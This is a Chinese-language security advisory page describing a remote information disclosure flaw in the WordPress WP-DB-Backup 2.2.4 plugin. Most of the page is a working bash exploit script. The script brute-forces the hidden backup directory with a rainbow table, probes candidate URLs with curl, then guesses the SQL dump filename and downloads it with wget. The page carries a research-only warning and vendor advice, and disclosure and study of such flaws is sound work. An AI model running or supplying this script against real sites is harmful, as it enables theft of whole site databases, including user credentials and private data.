首页 -> 安全研究
安全研究
安全漏洞
WordPress WP-DB-Backup插件'wp-db-backup.php'远程信息泄露漏洞
发布日期:2014-11-19
更新日期:2014-11-21
受影响系统:
WordPress WP-DB-Backup 2.2.4描述:
WordPress WP-DB-Backup
BUGTRAQ ID: 71177
WP-DB-Backup插件可以备份核心WordPress数据库表。
WP-DB-Backup 2.2.4及其他版本在实现上存在远程信息泄露漏洞,远程攻击者可利用此漏洞获取敏感信息。
<*来源:Larry Cashdollar
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#Larry W. Cashdollar, @_larry0
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#Usage: Compile raintable.c
#gcc raintable.c -o table;./table > rainbow
#run ./exp targetsite date
#date is in format YYYYMMDD e.g 20141031
if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching....";
for x in `cat rainbow`; do
CPATH="http://$1/wp-content/backup-$x/";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo $x > found.txt
exit; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=6;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi
# Now that we have the directory lets try to locate the database backup file.
K=999;
for y in `seq -w 0 999`; do
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Database backup $CPATH Found";
echo "[+] Received $RESULT";
wget $CPATH
exit; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=2;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://wordpress.org/plugins/wp-db-backup/
浏览次数:2295
严重程度:0(网友投票)
绿盟科技给您安全的保障